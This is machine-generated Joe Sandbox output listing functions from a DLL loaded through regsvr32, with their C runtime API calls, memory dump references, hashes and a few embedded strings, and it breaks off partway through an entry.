  • Part of subcall function 00007FFA526A3024: HeapFree.KERNEL32(?,?,00000000,00007FFA526A2DDC,?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A303A
  • Part of subcall function 00007FFA526A3024: _errno.LIBCMT ref: 00007FFA526A3044
  • Part of subcall function 00007FFA526A3024: GetLastError.KERNEL32(?,?,00000000,00007FFA526A2DDC,?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A304C
Memory Dump Source
• Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
• Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: Heapfree$CriticalDeleteEnvironmentFreeSectionStrings$CommandCreateCurrentErrorInfoInformationInitializeLastLineSleepStartupThreadValue__setargv_cinit_errno
                                                                      • String ID:
                                                                      • API String ID: 1549890855-0
                                                                      • Opcode ID: 1bfc46722c3ac8e7b1a3fe84d8ded69fde3dc3f1e7eef4d63a5cdedb7541036a
                                                                      • Instruction ID: e5dfb64b9407e299139e97043c7b8f828a5eb8b5807e32c8bad1eb5c1a66464e
                                                                      • Opcode Fuzzy Hash: 1bfc46722c3ac8e7b1a3fe84d8ded69fde3dc3f1e7eef4d63a5cdedb7541036a
                                                                      • Instruction Fuzzy Hash: 5A31D220E8C243C6FAA86BA15D8227911D5DF67750F1CC535DA1E85ECEEFACF8907212
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _getptd.LIBCMT ref: 00007FFA526A4CF3
                                                                        • Part of subcall function 00007FFA526A497C: GetOEMCP.KERNEL32(?,?,?,?,?,?,?,00007FFA526A4D0E,?,?,?,?,?,00007FFA526A4EE3), ref: 00007FFA526A49A6
                                                                        • Part of subcall function 00007FFA526A309C: Sleep.KERNEL32(?,?,00000000,00007FFA526A6B19,?,?,00000000,00007FFA526A6BC3,?,?,?,?,?,?,00000000,00007FFA526A2DC8), ref: 00007FFA526A30D2
                                                                      • free.LIBCMT ref: 00007FFA526A4D7F
                                                                        • Part of subcall function 00007FFA526A3024: HeapFree.KERNEL32(?,?,00000000,00007FFA526A2DDC,?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A303A
                                                                        • Part of subcall function 00007FFA526A3024: _errno.LIBCMT ref: 00007FFA526A3044
                                                                        • Part of subcall function 00007FFA526A3024: GetLastError.KERNEL32(?,?,00000000,00007FFA526A2DDC,?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A304C
                                                                      • _lock.LIBCMT ref: 00007FFA526A4DB7
                                                                      • free.LIBCMT ref: 00007FFA526A4E67
                                                                      • free.LIBCMT ref: 00007FFA526A4E97
                                                                      • _errno.LIBCMT ref: 00007FFA526A4E9C
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: free$_errno_getptd$ErrorFreeHeapLastSleep_lock
                                                                      • String ID:
                                                                      • API String ID: 1264244385-0
                                                                      • Opcode ID: 2d1c73193aff0bd2fa234daa6436aaac9807f819087f81d2c1bddea91d33e348
                                                                      • Instruction ID: 8510db2b7bb20af7e6b550142651a2e3f2e23e06d7e17c69f133942bcf408fbc
                                                                      • Opcode Fuzzy Hash: 2d1c73193aff0bd2fa234daa6436aaac9807f819087f81d2c1bddea91d33e348
                                                                      • Instruction Fuzzy Hash: 21516D22908682C7E7549B65AC4027AB7E1FF86B54F18C236D69E43BDDCFBCE4419740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: _errno$AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 502529563-0
                                                                      • Opcode ID: d18ae8e3cce73ce1a52224a39a8d43e75eaf3a21478d7bf67846a2816eda3af9
                                                                      • Instruction ID: dadcd8328247e3e3a8e127ae78119ce8e993efb004e3758cee6edfdee842a9fc
                                                                      • Opcode Fuzzy Hash: d18ae8e3cce73ce1a52224a39a8d43e75eaf3a21478d7bf67846a2816eda3af9
                                                                      • Instruction Fuzzy Hash: D9110025A19642C5FE556B61AC1127926D1DF86B90F0CC230EA2E47FCEDFBCE450A711
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateBoundaryDeleteDescriptorHeap
                                                                      • String ID: vb4vcW2kAW3Twaz?30
                                                                      • API String ID: 254689257-4179232793
                                                                      • Opcode ID: 08b1cf252e4ad689d9d92df66199491e9f35c83da394e0c34af369396f0aa75a
                                                                      • Instruction ID: 1bd5a091bcf8f322c5b05374612bff0bc4d00676a790642b1488eba387828f1b
                                                                      • Opcode Fuzzy Hash: 08b1cf252e4ad689d9d92df66199491e9f35c83da394e0c34af369396f0aa75a
                                                                      • Instruction Fuzzy Hash: 1D21F636A0CEC286E3218B14EC543A977E5FF89744F488535CACD87B69DFBDA5029B40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00007FFA526A36F0: _initp_misc_winsig.LIBCMT ref: 00007FFA526A3729
                                                                        • Part of subcall function 00007FFA526A36F0: EncodePointer.KERNEL32(?,?,?,00007FFA526A2FAB,?,?,?,00007FFA526A2179), ref: 00007FFA526A3745
                                                                      • FlsAlloc.KERNEL32(?,?,?,00007FFA526A2179), ref: 00007FFA526A2FBB
                                                                        • Part of subcall function 00007FFA526A3108: Sleep.KERNEL32(?,?,0000000A,00007FFA526A2DA3,?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A314D
                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FFA526A2179), ref: 00007FFA526A2FEC
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00007FFA526A3000
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: _lock$AllocCurrentEncodePointerSleepThreadValue_initp_misc_winsig
                                                                      • String ID:
                                                                      • API String ID: 54287522-0
                                                                      • Opcode ID: 926dbc3dc0f4bcdbbdac5bfac17ca3eb5364a16ed8e4c5d99003da15ed9a218c
                                                                      • Instruction ID: ff556a51c3374458c6c13c8b546d67d22c516b24c8612d8e346e8e2e4b77fc33
                                                                      • Opcode Fuzzy Hash: 926dbc3dc0f4bcdbbdac5bfac17ca3eb5364a16ed8e4c5d99003da15ed9a218c
                                                                      • Instruction Fuzzy Hash: EC014420E08583C1FB58AB759C0627462E1EF07724F0CC634D52D46EDDDFACA495A230
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 566 7ffa526a2050-7ffa526a207f call 7ffa52661000 ExitProcess
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID: JKvDDasqwOPvGXZdqW
                                                                      • API String ID: 621844428-4059861069
                                                                      • Opcode ID: deed1fdb9085c7dcd35d809f3e44395f38d7cca76780fd27941661c68abd14ec
                                                                      • Instruction ID: 60172eab89c5a4a9067c1c75ca3edb9fa1a5ab2538e6c52227e2557028c37a24
                                                                      • Opcode Fuzzy Hash: deed1fdb9085c7dcd35d809f3e44395f38d7cca76780fd27941661c68abd14ec
                                                                      • Instruction Fuzzy Hash: 48D09E25918A8181DA209B10EC1535A63E0FB8A345F844130D58C56B18DFBCD256C744
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _errno.LIBCMT ref: 00007FFA526A6D0F
                                                                        • Part of subcall function 00007FFA526A66D8: DecodePointer.KERNEL32 ref: 00007FFA526A66FF
                                                                      • RtlAllocateHeap.NTDLL(?,?,?,?,00000000,00007FFA526A313B,?,?,0000000A,00007FFA526A2DA3,?,?,?,00007FFA526A2DFF), ref: 00007FFA526A6D58
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateDecodeHeapPointer_errno
                                                                      • String ID:
                                                                      • API String ID: 15861996-0
                                                                      • Opcode ID: 39e9772f0cc65a7484b61a3e1fb2b868eaa6fa792f1398e078783a6d2fc3ba42
                                                                      • Instruction ID: ad83e10882b0ff5007c185d1c9918818adfebf0f576376ddca0e271bcc76e303
                                                                      • Opcode Fuzzy Hash: 39e9772f0cc65a7484b61a3e1fb2b868eaa6fa792f1398e078783a6d2fc3ba42
                                                                      • Instruction Fuzzy Hash: 5C119126B19242C6FF556B26EE1437962D1DF42BE4F1CCA34CA2D06ECCDFECA4409601
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _initp_misc_winsig.LIBCMT ref: 00007FFA526A3729
                                                                        • Part of subcall function 00007FFA526A755C: EncodePointer.KERNEL32(?,?,?,?,00007FFA526A373E,?,?,?,00007FFA526A2FAB,?,?,?,00007FFA526A2179), ref: 00007FFA526A7567
                                                                      • EncodePointer.KERNEL32(?,?,?,00007FFA526A2FAB,?,?,?,00007FFA526A2179), ref: 00007FFA526A3745
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: EncodePointer$_initp_misc_winsig
                                                                      • String ID:
                                                                      • API String ID: 190222155-0
                                                                      • Opcode ID: 29817383cbd5b8fc12b900dc218af1d2c44829c2a488d6b4e34f3447ba8c1d75
                                                                      • Instruction ID: 1fa57a3cff05371287f8927d47ef5ab377ccf5e1f9d347b6bfd6bfb85a79e237
                                                                      • Opcode Fuzzy Hash: 29817383cbd5b8fc12b900dc218af1d2c44829c2a488d6b4e34f3447ba8c1d75
                                                                      • Instruction Fuzzy Hash: B4F0AC00E89247C0ED0AFB623C620BC12C18F97780F4CA070E81F0AB9BDFACE551A345
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CreateInformation
                                                                      • String ID:
                                                                      • API String ID: 1774340351-0
                                                                      • Opcode ID: 489fa6aa26c4b222785c1fb3dc785f295b08bd9aa245ee8ef2e9349b67055af0
                                                                      • Instruction ID: 88b8433c66fc9cbb0bc20c7d527ed21fa069b5985aebf0537326600d04497c1a
                                                                      • Opcode Fuzzy Hash: 489fa6aa26c4b222785c1fb3dc785f295b08bd9aa245ee8ef2e9349b67055af0
                                                                      • Instruction Fuzzy Hash: AFE04F75A2578183E7999B21AC0976562D0FB89340F849439EB4D02F98DF7CD0458A00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • EncodePointer.KERNEL32(?,?,?,00007FFA526A34AF,?,?,?,00007FFA526A21CB), ref: 00007FFA526A740D
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: EncodePointer
                                                                      • String ID:
                                                                      • API String ID: 2118026453-0
                                                                      • Opcode ID: 0a2c1c774571843224449336236925bab63b88d9ce0b4f967ac09496dc1b8d3d
                                                                      • Instruction ID: a8265c63cf0fb8e1b8af45ea68f186a90c40fa4596aacaf69da68519109f4c69
                                                                      • Opcode Fuzzy Hash: 0a2c1c774571843224449336236925bab63b88d9ce0b4f967ac09496dc1b8d3d
                                                                      • Instruction Fuzzy Hash: 62D01722F98A81C2EB518B21FD9026D22A4EB86B94F5CC031DA5C06A59DE6CC8968701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • Sleep.KERNEL32(?,?,0000000A,00007FFA526A2DA3,?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A314D
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep_errno
                                                                      • String ID:
                                                                      • API String ID: 1068366078-0
                                                                      • Opcode ID: 99b9e4cc6464749d47a71fc1b610823d805388b9272814145126b07a25ab941d
                                                                      • Instruction ID: 823619daea01bfe9bf01a0d97ef5b2da89ebad3f671e94fedfdbc496fc616eb7
                                                                      • Opcode Fuzzy Hash: 99b9e4cc6464749d47a71fc1b610823d805388b9272814145126b07a25ab941d
                                                                      • Instruction Fuzzy Hash: 1F016233A24B85C6EA599B169C40029B6E5FB89FD0F0D9131DE5D07F58DF78E851C704
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00007FFA526A6C34: _FF_MSGBANNER.LIBCMT ref: 00007FFA526A6C64
                                                                        • Part of subcall function 00007FFA526A6C34: RtlAllocateHeap.NTDLL(?,?,00000000,00007FFA526A30C0,?,?,00000000,00007FFA526A6B19,?,?,00000000,00007FFA526A6BC3), ref: 00007FFA526A6C89
                                                                        • Part of subcall function 00007FFA526A6C34: _errno.LIBCMT ref: 00007FFA526A6CAD
                                                                        • Part of subcall function 00007FFA526A6C34: _errno.LIBCMT ref: 00007FFA526A6CB8
                                                                      • Sleep.KERNEL32(?,?,00000000,00007FFA526A6B19,?,?,00000000,00007FFA526A6BC3,?,?,?,?,?,?,00000000,00007FFA526A2DC8), ref: 00007FFA526A30D2
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: _errno$AllocateHeapSleep
                                                                      • String ID:
                                                                      • API String ID: 4153772858-0
                                                                      • Opcode ID: fda341601c3db2866e613cad0830f714017b4f3b234a5a25ccfa8741b4d7d732
                                                                      • Instruction ID: 4dce94b8ec07f36d40a8e5c16b4f53bab19f27582b4d37f33beaba1228b09778
                                                                      • Opcode Fuzzy Hash: fda341601c3db2866e613cad0830f714017b4f3b234a5a25ccfa8741b4d7d732
                                                                      • Instruction Fuzzy Hash: EEF0C832A097C5C2EA559F15AC4102DB2E0EB85B90F4C8134EA5D03F59DF7CE891C704
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: String$free$ByteCharMultiWide$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 1446610345-0
                                                                      • Opcode ID: 1cb68e5ebb75471bd28e921dddda68db4bd0a605ea05e1978d1bd0bd9315b2d8
                                                                      • Instruction ID: c15588bf082ebfd4d2ac1b4a0eaddf7ebda5a706271b2f9b7adfba150f7f4b48
                                                                      • Opcode Fuzzy Hash: 1cb68e5ebb75471bd28e921dddda68db4bd0a605ea05e1978d1bd0bd9315b2d8
                                                                      • Instruction Fuzzy Hash: 33F1BE32A09681CAE7209F259C401A977E1FB46B98F188635EA5E47FDCDFBCE940D700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: DecodeErrorLastPointer_errno$AddressLibraryLoadProc
                                                                      • String ID: ADVAPI32.DLL$SystemFunction036
                                                                      • API String ID: 1558914745-1064046199
                                                                      • Opcode ID: a4bc4b26b88413057c65bce35d9d543f8071dd4b5a3168f49804b7622c4c0c09
                                                                      • Instruction ID: 0101bcaa71ad7b3ff6575ff3fab873f5f9c70abd6d3631981c59649deb0db526
                                                                      • Opcode Fuzzy Hash: a4bc4b26b88413057c65bce35d9d543f8071dd4b5a3168f49804b7622c4c0c09
                                                                      • Instruction Fuzzy Hash: B6316821A1D642CAFB51AB25AC1427D62D1EF86B80F1C8434EA0E47F9EDFBCE5459701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: Locale$InfoValid$CodeDefaultPageUser_getptd_itow_s
                                                                      • String ID: Norwegian-Nynorsk
                                                                      • API String ID: 2273835618-461349085
                                                                      • Opcode ID: 27b601e54d08442215230f85cfe0824a991ba4f10c2dcca786a022abe7f281d3
                                                                      • Instruction ID: 6e052157399510fd4cc4dab98077123e1a6c702bc27906d2b96b0927572d441a
                                                                      • Opcode Fuzzy Hash: 27b601e54d08442215230f85cfe0824a991ba4f10c2dcca786a022abe7f281d3
                                                                      • Instruction Fuzzy Hash: A1614D63A09642C6FB649F259C6137927D0FB46B84F0CC136CA4E46AD9DFBCE940E305
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: FormatTime$__ascii_stricmpfree
                                                                      • String ID: a/p$am/pm
                                                                      • API String ID: 2252689280-3206640213
                                                                      • Opcode ID: f0a1e010cfc2bba628f50de28a03b415369789bd89755694daa0cdadb7c0128b
                                                                      • Instruction ID: 8e740dd8977669869c64ca0adee0f6f19256bf084884b0a285fb051e5aaed679
                                                                      • Opcode Fuzzy Hash: f0a1e010cfc2bba628f50de28a03b415369789bd89755694daa0cdadb7c0128b
                                                                      • Instruction Fuzzy Hash: 41F1B222919692C9E7648F28985017C67E1FB27784F4CD132EB8E47E8DDFBDA854E301
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FFA526A7194,?,?,?,?,00007FFA526A6C69,?,?,00000000,00007FFA526A30C0), ref: 00007FFA526A6FCF
                                                                      • GetStdHandle.KERNEL32(?,?,?,?,?,00007FFA526A7194,?,?,?,?,00007FFA526A6C69,?,?,00000000,00007FFA526A30C0), ref: 00007FFA526A70DB
                                                                      • WriteFile.KERNEL32 ref: 00007FFA526A7115
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: File$HandleModuleNameWrite
                                                                      • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                      • API String ID: 3784150691-4022980321
                                                                      • Opcode ID: a3f87b8c5f367064f797f5b9ceb23e0cb6ebb80f3dcd78d3f9f2145c33283283
                                                                      • Instruction ID: dff69e991f5a39f92f4e28816e7cc45507b5cc2ed09b7f144a1723dc13437372
